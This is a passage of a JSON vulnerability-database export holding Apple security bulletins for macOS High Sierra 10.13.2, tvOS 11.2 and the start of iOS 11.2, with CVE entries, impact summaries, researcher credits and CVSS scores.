Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-27T08:21:38", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:22", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:56:48", "title": "About the security content of tvOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2018-10-18T05:56:48", "id": "APPLE:HT208327", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:39", "description": "# About the security content of tvOS 11.2\n\nThis document describes the security content of tvOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-04T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-04T00:00:00", "id": "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:20", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project 